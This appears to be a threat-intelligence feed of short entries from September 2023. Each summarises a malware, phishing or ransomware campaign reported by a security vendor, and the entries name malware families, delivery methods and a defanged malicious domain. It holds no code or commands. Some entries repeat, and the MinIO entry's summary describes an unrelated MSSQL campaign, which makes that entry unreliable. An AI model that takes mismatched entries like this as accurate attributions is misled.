Netskope Threat Labs is monitoring a campaign that uses malicious Python scripts to steal Facebook business users' credentials and browser data. The campaign targets accounts with bogus Facebook messages carrying a malicious file attachment. The attacks generally target victims in Southern Europe and North America.
Source: https://www.netskope.com/blog/new-python-nodestealer-goes-beyond-facebook-credentials-now-stealing-all-browser-cookies-and-login-credentials
2023-09-15
Python_malware_activity_campaigns
LOW
Intel Source:
Cyble
Intel Name:
Python_malware_activity_campaigns
Date of Scan:
2023-09-15
Impact:
LOW
Summary:
Cyble researchers discovered Python malware that captures screenshots and sends them over FTP to remote attackers. They also observed similar campaigns in the recent past targeting the United States and Germany, attributed to the perpetrator tracked as "TA866". This campaign involves the execution of a PowerShell script that takes screenshots and uploads them to a remote FTP server.
Source: https://cyble.com/blog/tatar-language-users-in-the-crosshairs-of-python-screenshotter/
2023-09-15
Free_download_manager_served_Linux_malware
LOW
Intel Source:
Security Affairs
Intel Name:
Free_download_manager_served_Linux_malware
Date of Scan:
2023-09-15
Impact:
LOW
Summary:
Researchers from Kaspersky observed a free download manager site that had been hacked to serve Linux malware. During their research, the experts discovered that the compromised domain had a deb.fdmpkg[.]org subdomain.
Source: https://securityaffairs.com/150851/malware/free-download-manager-supply-chain-attack.html?amp=1
2023-09-15
Unauthorized_access_to_Cloud_accounts
LOW
Intel Source:
Retool
Intel Name:
Unauthorized_access_to_Cloud_accounts
Date of Scan:
2023-09-15
Impact:
LOW
Summary:
Retool recently informed 27 of its cloud customers that there had been unauthorized access to their accounts. The attacker was able to navigate through multiple layers of security controls after compromising one of Retool's employees through an SMS-based phishing attack.
Source: https://retool.com/blog/mfa-isnt-mfa/
2023-09-14
New_MidgeDropper_dropper
MEDIUM
Intel Source:
Fortinet
Intel Name:
New_MidgeDropper_dropper
Date of Scan:
2023-09-14
Impact:
MEDIUM
Summary:
FortiGuard Labs discovered a new dropper variant called MidgeDropper, which made an interesting case study for their analysis. The affected platform is Windows, and the potential impact is the deployment of additional malware for further purposes.
Source: https://www.fortinet.com/blog/threat-research/new-midgedropper-variant
2023-09-14
Credit_card_theft_malware
LOW
Intel Source:
Sucuri
Intel Name:
Credit_card_theft_malware
Date of Scan:
2023-09-14
Impact:
LOW
Summary:
During the cleanup of a compromised Magento ecommerce website, Sucuri analysts caught something that drew their attention: credit card theft malware concealed through a single, invisible pixel. In their post, the analysts explore how the attackers used a single hidden pixel as a red herring to conceal a broader infection on a checkout page, and review a collection of other similar Magecart attacks.
Source: https://blog.sucuri.net/2023/09/decoding-magecart-credit-card-skimmers-concealed-through-pixels-images.html
2023-09-14
Scams_Targeting_Windows_Action_Center_Notifications
LOW
Intel Source:
Zscaler
Intel Name:
Scams_Targeting_Windows_Action_Center_Notifications
Date of Scan:
2023-09-14
Impact:
LOW
Summary:
Zscaler researchers have recently noticed an increase in tech support scams, with a particular emphasis on the abuse of Windows Action Center notifications to show consumers false warnings. While fake Windows Defender notifications used to make up the majority of tech-support scams, scammers have since expanded their repertoire to include phony websites pretending to be those of McAfee and Avast, among other security companies.
Source: https://www.zscaler.com/blogs/security-research/rise-tech-support-scams-abusing-windows-action-center-notifications
2023-09-14
W3LL_Behind_Phishing_Attack_on_Microsoft_365_Business
LOW
Intel Source:
Group-IB
Intel Name:
W3LL_Behind_Phishing_Attack_on_Microsoft_365_Business
Date of Scan:
2023-09-14
Impact:
LOW
Summary:
Group-IB found that a custom phishing kit called W3LL Panel, designed to bypass MFA, and 16 other fully customized tools for business email compromise (BEC) attacks were available for purchase on the threat actor's private underground market, W3LL Store, which catered to a closed community of at least 500 other threat actors.
Source: https://go.group-ib.com/hubfs/report/group-ib-w3ll-done-threat-report-2023.pdf
2023-09-13
RedLine_Vidar_Using_EV_Certificates_and_Switches_to_Ransomware
MEDIUM
Intel Source:
TrendMicro
Intel Name:
RedLine_Vidar_Using_EV_Certificates_and_Switches_to_Ransomware
Date of Scan:
2023-09-13
Impact:
MEDIUM
Summary:
Researchers from TrendMicro have discovered that the threat actors behind RedLine and Vidar are now disseminating ransomware payloads using the same delivery methods they employ to disseminate info stealers. By making their approaches versatile, the threat actors may be streamlining their activities. They looked into an instance where the victim had initially been exposed to information-stealing malware that had been signed using Extended Validation (EV) code signing certificates. But eventually, they began getting ransomware payloads over the same channel.
Source: https://www.trendmicro.com/en_us/research/23/i/redline-vidar-first-abuses-ev-certificates.html
2023-09-13
Vidar_Malware_is_Back_to_Compromise_PEC_Mails
LOW
Intel Source:
CERT-AGID
Intel Name:
Vidar_Malware_is_Back_to_Compromise_PEC_Mails
Date of Scan:
2023-09-13
Impact:
LOW
Summary:
CERT-AGID, with the assistance of the affected PEC Managers, discovered and stopped a new large-scale malware campaign that is distributed through a number of previously compromised Certified Email (PEC) accounts and targets other PEC mailboxes.
Source: https://cert-agid.gov.it/news/il-malware-vidar-torna-ad-insidiare-le-caselle-pec/
2023-09-13
Delivering_RATs_and_Stealers_via_Updated_DBatLoader
LOW
Intel Source:
IBM Security Intelligence
Intel Name:
Delivering_RATs_and_Stealers_via_Updated_DBatLoader
Date of Scan:
2023-09-13
Impact:
LOW
Summary:
Researchers from IBM X-Force have discovered new features in DBatLoader malware samples distributed in recent email campaigns, indicating a higher risk of infection from common malware families linked to DBatLoader activities. Additionally, since late June, they have seen close to 20 email campaigns that send payloads including Remcos, Warzone, Formbook, and AgentTesla using the new DBatLoader loader.
Source: https://securityintelligence.com/posts/email-campaigns-leverage-updated-dbatloader-deliver-rats-stealers/
2023-09-13
Analyzing_a_Suspected_Remcos_Malware_Attack_on_Colombian_Firms
LOW
Intel Source:
Checkpoint
Intel Name:
Analyzing_a_Suspected_Remcos_Malware_Attack_on_Colombian_Firms
Date of Scan:
2023-09-13
Impact:
LOW
Summary:
Researchers from Check Point have discovered a brand-new, extensive phishing effort that recently targeted more than 40 eminent businesses in Colombia across a variety of industries. The goal of the attackers is to covertly set up the infamous "Remcos" malware on the PCs of its victims. Remcos is an advanced "Swiss Army Knife" RAT that gives hackers complete control over the infected computer and may be used in a variety of assaults. Data theft, subsequent infections, and account takeover are common effects of a Remcos infection.
Source: https://research.checkpoint.com/2023/guarding-against-the-unseen-investigating-a-stealthy-remcos-malware-attack-on-colombian-firms/
2023-09-13
A_Look_at_APT36_Modernized_Weaponry
MEDIUM
Intel Source:
Zscaler
Intel Name:
A_Look_at_APT36_Modernized_Weaponry
Date of Scan:
2023-09-13
Impact:
MEDIUM
Summary:
Researchers from Zscaler have found new malicious activities being carried out by the Pakistan-based advanced persistent threat group (APT36) that are intended to attack both Windows and Linux operating systems.
Source: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
2023-09-13
A_Failed_LockBit_Attack_Replaced_at_3AM_Ransomware
HIGH
Intel Source:
Symantec
Intel Name:
A_Failed_LockBit_Attack_Replaced_at_3AM_Ransomware
Date of Scan:
2023-09-13
Impact:
HIGH
Summary:
A brand-new ransomware family named 3AM has appeared. According to Symantec researchers, it was employed in a single attack by a ransomware affiliate that tried to install LockBit on a target's network but switched to 3AM after LockBit was blocked. 3AM is written in Rust and appears to be an entirely new malware family. Before it starts encrypting files, the ransomware makes many attempts to shut down various services on the affected machine. After encryption is finished, it attempts to delete Volume Shadow (VSS) copies. It is currently unknown whether its creators have any connections to known cybercrime organizations.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
2023-09-12
Redfly_APT_Group_Targeting_Critical_Infrastructure
MEDIUM
Intel Source:
Symantec
Intel Name:
Redfly_APT_Group_Targeting_Critical_Infrastructure
Date of Scan:
2023-09-12
Impact:
MEDIUM
Summary:
Researchers from Symantec have discovered evidence that a threat actor organization they refer to as Redfly used the ShadowPad Trojan to hack a national grid in an Asian nation for as long as six months earlier this year. Multiple computers on the organization's network were compromised, and the attackers were successful in stealing credentials.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/critical-infrastructure-attacks
2023-09-12
Malicious_Word_Document_Spreads_OriginBotnet
LOW
Intel Source:
Fortinet
Intel Name:
Malicious_Word_Document_Spreads_OriginBotnet
Date of Scan:
2023-09-12
Impact:
LOW
Summary:
Researchers at FortiGuard have discovered a sophisticated phishing campaign that employs a Microsoft Word document lure to disseminate a trio of threats, including Agent Tesla and OriginBotnet, in order to collect a variety of data from infected Windows devices.
Source: https://www.fortinet.com/blog/threat-research/originbotnet-spreads-via-malicious-word-document
2023-09-12
New_MetaStealer_Malware_Targeting_macOS_Users
LOW
Intel Source:
Sentinelone
Intel Name:
New_MetaStealer_Malware_Targeting_macOS_Users
Date of Scan:
2023-09-12
Impact:
LOW
Summary:
Researchers at SentinelOne have seen attackers using the malware, which is known as MetaStealer, to target Mac users across a variety of industries in an effort to infiltrate corporate networks. The MetaStealer malware is typically concealed in malicious documents or files, occasionally in files that have been made to resemble Adobe software or files.
Source: https://www.sentinelone.com/blog/macos-metastealer-new-family-of-obfuscated-go-infostealers-spread-in-targeted-attacks/
2023-09-12
Espionage_Actors_target_critical_infrastructure
LOW
Intel Source:
Symantec
Intel Name:
Espionage_Actors_target_critical_infrastructure
Date of Scan:
2023-09-12
Impact:
LOW
Summary:
Symantec's Threat Hunter Team has discovered evidence that a threat actor group Symantec calls Redfly used the ShadowPad Trojan to compromise a national grid in an Asian country for as long as six months earlier this year. The attackers managed to steal credentials and compromise multiple computers on the organization's network.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks
2023-09-12
Potential_Supply_Chain_Attack_Against_Linux_Machines
MEDIUM
Intel Source:
Securelist
Intel Name:
Potential_Supply_Chain_Attack_Against_Linux_Machines
Date of Scan:
2023-09-12
Impact:
MEDIUM
Summary:
Researchers from Securelist have examined samples targeting Linux systems. While investigating a group of suspicious domains, they came across one such persistent attack.
Source: https://securelist.com/backdoored-free-download-manager-linux-malware/110465/
2023-09-12
Introducing_Charming_Kitten_New_Backdoor_Sponsor
MEDIUM
Intel Source:
Welivesecurity
Intel Name:
Introducing_Charming_Kitten_New_Backdoor_Sponsor
Date of Scan:
2023-09-12
Impact:
MEDIUM
Summary:
Researchers from ESET have discovered that the Iranian threat actor Charming Kitten is connected to a recent round of attacks that target various targets in Brazil, Israel, and the United Arab Emirates using a hidden Ballistic Bobcat backdoor they have dubbed Sponsor. Victimology patterns suggest that the group primarily singles out education, government, and healthcare organizations, as well as human rights activists and journalists.
Source: https://www.welivesecurity.com/en/eset-research/sponsor-batch-filed-whiskers-ballistic-bobcats-scan-strike-backdoor/
2023-09-12
A_new_Evilnum_campaign
LOW
Intel Source:
Cyber Threat Intelligence Network
Intel Name:
A_new_Evilnum_campaign
Date of Scan:
2023-09-12
Impact:
LOW
Summary:
CTIN has observed a new campaign that is associated with a previous malicious campaign connected to Evilnum. EvilNum is a threat group characterized by an evolving toolkit and sector-specific and geographic-specific targeting. The researchers made a deep technical analysis of observations between 2018 and 2020. More recently, Cybereason has described one of the group's newest tools, the PyVil Remote Access Trojan (RAT).
Source: https://cyberthreatintelligencenetwork.com/index.php/2023/09/08/potential-new-evilnum-campaign/
2023-09-12
Andromeda_latest_malware
LOW
Intel Source:
Threatfabric
Intel Name:
Andromeda_latest_malware
Date of Scan:
2023-09-12
Impact:
LOW
Summary:
ThreatFabric analysts observed a new malware family called Andromeda. The name comes from the URLs of the C2 servers used to create Remote Access sessions. In addition to this malicious activity from threat actors focused on the country's traditional banking ecosystem, increased targeting of more modern financial services technologies has also been observed.
Source: https://www.threatfabric.com/blogs/andromeda-the-latest-brazilian-dto-malware-0
2023-09-11
Attacks_by_APT_Using_BlueShell_on_Korean_and_Thai_Targets
LOW
+
Intel Source:
ASEC
Intel Name:
Attacks_by_APT_Using_BlueShell_on_Korean_and_Thai_Targets
Date of Scan:
2023-09-11
Impact:
LOW
Summary:
A backdoor called BlueShell is created in Go. It is accessible via GitHub and works with Windows, Linux, and Mac OS. Although it appears that the original GitHub repository has been removed, additional repositories still offer access to the BlueShell source code. Notably, the ReadMe file that contains the instructions is in Chinese, which raises the possibility that the author is a Chinese speaker.
Source: https://asec.ahnlab.com/en/56941/
2023-09-11
Technical_Investigation_of_HijackLoader
LOW
+
Intel Source:
Zscaler
Intel Name:
Technical_Investigation_of_HijackLoader
Date of Scan:
2023-09-11
Impact:
LOW
Summary:
Zscaler researchers have noticed that a new malware loader known as HijackLoader is becoming more popular among cybercriminals for distributing payloads such as DanaBot, SystemBC, and RedLine Stealer. HijackLoader employs a modular architecture, a trait that most loaders lack, so even though it lacks advanced functionality, it can leverage a number of modules for code injection and execution.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader
2023-09-11
Agent_Tesla_Delivering_via_VBScript
LOW
+
Intel Source:
McAfee
Intel Name:
Agent_Tesla_Delivering_via_VBScript
Date of Scan:
2023-09-11
Impact:
LOW
Summary:
Researchers from McAfee have discovered a variant in which Agent Tesla is being disseminated via VBScript (VBS) files, deviating from its typical dissemination techniques. VBS files are script files used in Windows to automate operations, configure computers, and carry out various activities. Cybercriminals may also take advantage of them to spread malicious software and carry out damaging operations on computers.
Source: https://www.mcafee.com/blogs/security-news/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/
2023-09-11
The_brute_force_attacks_targeting_Cisco_ASA
LOW
+
Intel Source:
Security Affairs
Intel Name:
The_brute_force_attacks_targeting_Cisco_ASA
Date of Scan:
2023-09-11
Impact:
LOW
Summary:
Security Affairs researchers reported in their blog that Cisco has observed Akira ransomware threat actors targeting Cisco VPNs that are not configured for multi-factor authentication in order to infiltrate organizations; Cisco has discovered instances where the threat actors appear to be targeting organizations that do not configure multi-factor authentication for their VPN users.
Source: https://securityaffairs.com/150157/cyber-crime/cisco-asa-ransomware-attacks.html
2023-09-11
DarkGate_Loader_Malware_Leveraging_Microsoft_Teams
MEDIUM
+
Intel Source:
Truesec
Intel Name:
DarkGate_Loader_Malware_Leveraging_Microsoft_Teams
Date of Scan:
2023-09-11
Impact:
MEDIUM
Summary:
The DarkGate Loader malware is delivered by a Microsoft Teams malware campaign that the Truesec Cybersecurity Team has investigated. Microsoft Teams chat messages were delivered on August 29 between 11:25 and 12:25 UTC from two external Office 365 accounts that had been compromised before the campaign. The message content is designed to trick its recipients into downloading and running a malicious file that is hosted remotely.
Source: https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams
2023-09-11
An_Analysis_of_Cuba_Ransomware
LOW
+
Intel Source:
Securelist
Intel Name:
An_Analysis_of_Cuba_Ransomware
Date of Scan:
2023-09-11
Impact:
LOW
Summary:
Researchers from Securelist have examined the Cuba ransomware. They initially became aware of the group's offensives in late 2020. The name "Cuba" had not yet been given to the cybercriminals; at the time, they were known as "Tropical Scorpius". Organizations in the US, Canada, and Europe are the targets of this ransomware. The gang has carried out a slew of impactful attacks against financial institutions, healthcare organizations, government organizations, and oil industries.
Source: https://securelist.com/cuba-ransomware/110533/
2023-09-08
Advanced_Attack_Groups_JavaScript_RATs_and_APT_Ransomware
MEDIUM
+
Intel Source:
Gteltsc
Intel Name:
Advanced_Attack_Groups_JavaScript_RATs_and_APT_Ransomware
Date of Scan:
2023-09-08
Impact:
MEDIUM
Summary:
This article highlights Chimera Group targeting semiconductor and aerospace industries, a JavaScript RAT campaign in Asian government institutions, the Solorigate campaign's transition, Chinese APT groups turning to ransomware, and the PLEASE_READ_ME ransomware campaign targeting MySQL servers.
Source: https://gteltsc.vn/blog/thong-tin-cac-moi-de-doa-bao-mat-trong-thang-01-2021-9681.html
2023-09-08
Return_of_RisePro_Stealer_With_New_Updates
LOW
+
Intel Source:
Flashpoint
Intel Name:
Return_of_RisePro_Stealer_With_New_Updates
Date of Scan:
2023-09-08
Impact:
LOW
Summary:
After going dark for almost seven months, the RisePro stealer made a comeback in July, according to its vendor, who claims that this new and enhanced version will provide customers with a better experience.
Source: https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/
2023-09-08
A_Comprehensive_Analysis_of_70_Layers_of_Info_Stealing_Malware
LOW
+
Intel Source:
Checkmarx
Intel Name:
A_Comprehensive_Analysis_of_70_Layers_of_Info_Stealing_Malware
Date of Scan:
2023-09-08
Impact:
LOW
Summary:
Researchers from Checkmarx have examined an intriguing sample that is wrapped in numerous obfuscation layers. These packages are quite difficult to analyze. The attackers have apparently not yet understood that no amount of obfuscation can conceal their aims.
Source: https://checkmarx.com/blog/a-deep-dive-into-70-layers-of-obfuscated-info-stealer-malware/
2023-09-08
Fake_Browser_Updates_Distribute_Malware
LOW
+
Intel Source:
Esentire
Intel Name:
Fake_Browser_Updates_Distribute_Malware
Date of Scan:
2023-09-08
Impact:
LOW
Summary:
Recently, eSentire's Threat Response Unit researchers have discovered evidence of cases related to LummaC2 across multiple industries. LummaC2 is an information stealer distributed as a Malware-as-a-Service (MaaS) offering on Russian-language forums. The researchers suspect that it also has the ability to load additional malware onto the system. In a recent case in August, a user became infected with LummaC2, Amadey, and PrivateLoader after running a fake Chrome browser update.
Source: https://www.esentire.com/blog/fake-browser-updates-distribute-lummac-stealer-amadey-and-privateloader-malware
2023-09-08
Another_Attack_on_Security_Researchers_by_North_Korean_Hackers
MEDIUM
+
Intel Source:
Google Blog
Intel Name:
Another_Attack_on_Security_Researchers_by_North_Korean_Hackers
Date of Scan:
2023-09-08
Impact:
MEDIUM
Summary:
In January 2021, Google made the initial discovery that DPRK attackers were targeting not only innocent, defenseless people or organizations, but also the cybersecurity experts themselves. The attackers have returned, this time armed with a brand-new zero-day vulnerability, a fake software tool, and a strikingly broad phishing campaign.
Source: https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/
2023-09-08
Phishing_Campaign_Disguises_Emails_as_PDF_Viewer_Screens
LOW
+
Intel Source:
ASEC
Intel Name:
Phishing_Campaign_Disguises_Emails_as_PDF_Viewer_Screens
Date of Scan:
2023-09-08
Impact:
LOW
Summary:
AhnLab's Security Emergency Response Center (ASEC) has uncovered a phishing campaign distributing malicious script files posing as PDF document viewer screens. These emails carry filenames related to purchase orders and receipts to lure recipients. When opened, the attachment prompts users to enter their email passwords to access the document, displaying varying messages based on the number of login attempts. After three tries, users are redirected to a legitimate PDF to mask the phishing attempt. The script can also send the captured user data via Telegram for anonymity.
Source: https://asec.ahnlab.com/en/56812/
2023-09-08
New_Hive0117_Phishing_Campaign_Delivering_DarkWatchman_Malware
LOW
+
Intel Source:
IBM Security Intelligence
Intel Name:
New_Hive0117_Phishing_Campaign_Delivering_DarkWatchman_Malware
Date of Scan:
2023-09-08
Impact:
LOW
Summary:
IBM X-Force researchers have discovered a new phishing attack, probably launched by Hive0117, that targeted individuals working in major Russian, Kazakh, Latvian, and Estonian organizations in the energy, banking, transportation, and software security sectors.
Source: https://securityintelligence.com/x-force/new-hive0117-phishing-campaign-imitates-conscription-summons-deliver-darkwatchman-malware/
2023-09-08
Multiple_APT_Groups_Exploiting_CVE_2022_47966_and_CVE_2022_42475
MEDIUM
+
Intel Source:
CISA
Intel Name:
Multiple_APT_Groups_Exploiting_CVE_2022_47966_and_CVE_2022_42475
Date of Scan:
2023-09-08
Impact:
MEDIUM
Summary:
Researchers from CISA have discovered indicators of compromise (IOCs) dating as early as January 2023 at a company in the aerospace sector. The CVE-2022-47966 vulnerability was exploited by nation-state advanced persistent threat (APT) actors to access a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. The vulnerable ManageEngine application permits remote code execution. Other APT actors were seen establishing a presence on the company's firewall device by exploiting CVE-2022-42475.
Source: https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475_0.pdf
2023-09-08
RedEyes_CHM_Malware_Using_the_Topic_of_Fukushima_Wastewater_Release
LOW
+
Intel Source:
ASEC
Intel Name:
RedEyes_CHM_Malware_Using_the_Topic_of_Fukushima_Wastewater_Release
Date of Scan:
2023-09-08
Impact:
LOW
Summary:
ASEC researchers have discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company” covered in March of this year and also uses the same commands used in the “2.3. Persistence” stage in the attack process of the RedEyes group’s M2RAT malware.
Source: https://asec.ahnlab.com/en/56857/
2023-09-08
A_phishing_attack_using_Google_Looker_Studio
LOW
+
Intel Source:
Checkpoint
Intel Name:
A_phishing_attack_using_Google_Looker_Studio
Date of Scan:
2023-09-08
Impact:
LOW
Summary:
In their report, Check Point Harmony researchers are discussing how hackers are using social engineering with a Google domain, designed to elicit a user response and hand over credentials to crypto sites. In this attack, hackers are utilizing Google Looker Studio to host credential harvesting crypto sites.
Source: https://blog.checkpoint.com/security/phishing-via-google-looker-studio/
2023-09-07
In_depth_analysis_of_Scarleteel_2_threat
LOW
+
Intel Source:
Sysdig
Intel Name:
In_depth_analysis_of_Scarleteel_2_threat
Date of Scan:
2023-09-07
Impact:
LOW
Summary:
In a Sysdig post, their analysts provided a full, detailed report about a cyber attack that reverberated across the digital realm: SCARLETEEL. They map this serious incident to the MITRE ATT&CK framework, providing deep insights into the operational tactics of the adversaries.
Source: https://sysdig.com/blog/scarleteel-mitre-attack/
2023-09-07
Cybercriminals_are_abusing_Advanced_Installer
LOW
+
Intel Source:
Talos
Intel Name:
Cybercriminals_are_abusing_Advanced_Installer
Date of Scan:
2023-09-07
Impact:
LOW
Summary:
Talos observed an ongoing cryptocurrency mining campaign that sends malicious payloads by abusing the tool Advanced Installer. This is a legitimate tool designed to create software packages for Windows. The software installers targeted in this campaign are specifically used for 3-D modeling and graphic design.
Source: https://blog.talosintelligence.com/cybercriminals-target-graphic-designers-with-gpu-miners/
2023-09-07
Phishing_emails_abusing_another_Cloudflare_service
LOW
+
Intel Source:
Trustwave
Intel Name:
Phishing_emails_abusing_another_Cloudflare_service
Date of Scan:
2023-09-07
Impact:
LOW
Summary:
Trustwave is seeing a lot of phishing emails with URLs abusing another Cloudflare service, r2.dev. The subjects of the phishing emails contain alarming or common keywords such as "statement paid", "upgrade mail", "purchase order", etc.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-bucket-of-phish-attackers-shift-tactics-with-cloudflare-r2-public-buckets/
2023-09-07
New_Warp_Malware_Dropping_Modified_Stealerium_Infostealer
LOW
+
Intel Source:
Seqrite
Intel Name:
New_Warp_Malware_Dropping_Modified_Stealerium_Infostealer
Date of Scan:
2023-09-07
Impact:
LOW
Summary:
To serve certain demands and exploit certain vulnerabilities, cybercriminals have started marketing and disseminating several stealthy malware variants. Stealer malware today, such as the "Warp Stealer," is quite advanced and versatile. From infected PCs, it can collect useful data such as hardware specifications, network setups, browser history, and private information pertaining to finances and online activities.
Source: https://www.seqrite.com/blog/new-warp-malware-drops-modified-stealerium-infostealer/
2023-09-07
Mac_users_targeted_in_new_malvertising_campaign_delivering_Atomic_Stealer
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Mac_users_targeted_in_new_malvertising_campaign_delivering_Atomic_Stealer
Date of Scan:
2023-09-07
Impact:
LOW
Summary:
AMOS was first promoted as a Mac OS stealer with a strong focus on crypto assets in April 2023. It also included a file grabber and the ability to harvest passwords from browsers and Apple's keychain. A new version of the project was released at the end of June as a result of the developer's active work on it.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising
2023-09-07
An_Examination_of_a_New_Stealing_Campaign
LOW
+
Intel Source:
Zscaler
Intel Name:
An_Examination_of_a_New_Stealing_Campaign
Date of Scan:
2023-09-07
Impact:
LOW
Summary:
A new theft campaign known as the "Steal-It" campaign was just found by Zscaler ThreatLabz. In this campaign, the threat actors use modified versions of Nishang's Start-CaptureServer PowerShell script to steal and exfiltrate NTLMv2 hashes. They then run various system tasks, extract the data, and exfiltrate it utilizing Mockbin APIs.
Source: https://www.zscaler.com/blogs/security-research/steal-it-campaign
2023-09-07
Spreading_New_Agent_Tesla_Variant_through_Excel_Document
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Spreading_New_Agent_Tesla_Variant_through_Excel_Document
Date of Scan:
2023-09-07
Impact:
MEDIUM
Summary:
Researchers from FortiGuard have discovered a phishing campaign spreading a new Agent Tesla variant. This well-known malware family is a data stealer and .NET-based Remote Access Trojan (RAT) used to obtain initial access, and it is frequently utilized for Malware-as-a-Service (MaaS). The thorough examination of this campaign covers everything from the initial phishing email to the actions of Agent Tesla installed on the victim's computer and the gathering of personal data from the compromised device.
Source: https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
2023-09-06
More_deep_look_at_RedLine_Stealer_traffic
LOW
+
Intel Source:
PaloAlto
Intel Name:
More_deep_look_at_RedLine_Stealer_traffic
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
In July 2023, the Palo Alto team captured a packet capture (pcap) with a RedLine Stealer infection. Their analysis provides the details and a deeper look at RedLine Stealer traffic.
Source: https://unit42.paloaltonetworks.com/wireshark-quiz-redline-stealer-answers/
2023-09-06
New_Chaes_Malware_Variant_Targeting_Logistics_and_Financial_Sectors
LOW
+
Intel Source:
Morphisec
Intel Name:
New_Chaes_Malware_Variant_Targeting_Logistics_and_Financial_Sectors
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
Researchers at Morphisec have discovered a concerning pattern where many clients, mostly from the banking and logistics industries, were being attacked by a brand-new, highly developed Chaes malware version. Between April and June 2023, variants of the threat were seen to become more sophisticated.
Source: https://www.morphisec.com/hubfs/Morphisec_Chae$4_Threat_Profile.pdf
2023-09-06
Info_Stealing_Malware_Plagues_Open_Source_Ecosystem
LOW
+
Intel Source:
Checkmarx
Intel Name:
Info_Stealing_Malware_Plagues_Open_Source_Ecosystem
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
From April to the middle of August, Checkmarx researchers have seen that threat actor PYTA31 has been actively disseminating "WhiteSnake" malware using malicious packages in the PyPI repository. Multiple operating systems can be targeted by the malware.
Source: https://checkmarx.com/blog/threat-actor-continues-to-plague-the-open-source-ecosystem-with-sophisticated-info-stealing-malware/
2023-09-06
Backdoor_Distribution_Through_Malicious_LNK
LOW
+
Intel Source:
ASEC
Intel Name:
Backdoor_Distribution_Through_Malicious_LNK
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
Malware that was formerly delivered in CHM format is now being spread in LNK format, according to ASEC experts. Through the mshta process, this malware runs other scripts that are located at a certain URL. Following that, it gets instructions from the threat actor's server to engage in more malicious actions.
Source: https://asec.ahnlab.com/en/56756/
2023-09-06
Analysis_of_the_FBI_Operation_Duck_Hunt
LOW
+
Intel Source:
Emanuele Delucia
Intel Name:
Analysis_of_the_FBI_Operation_Duck_Hunt
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
The “Duck Hunt” campaign is linked to a specific campaign called “Operation Duck Hunt” that disrupted the Qakbot botnet. The name might have been chosen to symbolize the effort to track down and disable the Qakbot botnet, similar to shooting down ducks in the game.
Source: https://www.emanueledelucia.net/under-the-shellcode-of-operation-duck-hunt-analysis-of-the-fbis-ducks-killer/
2023-09-06
Dark_Web_Profile_of_Medusa_Ransomware
LOW
+
Intel Source:
SOC Radar
Intel Name:
Dark_Web_Profile_of_Medusa_Ransomware
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
Cybersecurity professionals have been aware of the Medusa Ransomware (also known as MedusaLocker). The Medusa Ransomware gang collaborates with international affiliates while using the ransomware-as-a-service (RaaS) business model, expanding its reach and effect even further.
Source: https://socradar.io/dark-web-profile-medusa-ransomware-medusalocker/
2023-09-06
Insights_into_DuckTail_operation
LOW
+
Intel Source:
Zscaler
Intel Name:
Insights_into_DuckTail_operation
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
Zscaler ThreatLabz started intelligence collection on the DuckTail operation back in May 2023. Over the last couple of months of collection, Zscaler obtained critical details about DuckTail's operational framework. That collection gave the Zscaler team visibility into DuckTail's end-to-end operations, spanning the entire kill chain from reconnaissance to post-compromise. The Zscaler team gained valuable insights into DuckTail's intrusion techniques, compromise tactics, post-compromise procedures, and the underground economy.
Source: https://www.zscaler.com/blogs/security-research/look-ducktail
2023-09-06
New_MaaS_Prysmax_malware
LOW
+
Intel Source:
Cyfirma
Intel Name:
New_MaaS_Prysmax_malware
Date of Scan:
2023-09-06
Impact:
LOW
Summary:
The CYFIRMA research team has detected a new malware-as-a-service known as Prysmax. The malware is undetected by most of the signature-based detections commonly employed by antivirus solutions. By manipulating file associations and executing alongside legitimate .exe processes, the Prysmax stealer maximizes its reach and impact.
Source: https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/
2023-09-05
Cyberattack_by_APT28_Using_msedge_as_a_Bootloader
LOW
+
Intel Name:
Cyberattack_by_APT28_Using_msedge_as_a_Bootloader
Date of Scan:
2023-09-05
Impact:
LOW
Summary:
Researchers from CERT-UA have observed a deliberate cyber attack against a crucial Ukrainian energy infrastructure site. An email message with a phony sender address and a link to an archive, like "photo.zip," is being distributed to carry out the malicious scheme.
Source: https://cert.gov.ua/article/5702579
2023-09-05
Hackers_Exploiting_MinIO_Storage_System
LOW
+
Intel Source:
Security Joes
Intel Name:
Hackers_Exploiting_MinIO_Storage_System
Date of Scan:
2023-09-05
Impact:
LOW
Summary:
Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
Source: https://www.securityjoes.com/post/new-attack-vector-in-the-cloud-attackers-caught-exploiting-object-storage-services
2023-09-04
Okta_Warns_of_Social_Engineering_Attacks
LOW
+
Intel Source:
Okta
Intel Name:
Okta_Warns_of_Social_Engineering_Attacks
Date of Scan:
2023-09-04
Impact:
LOW
Summary:
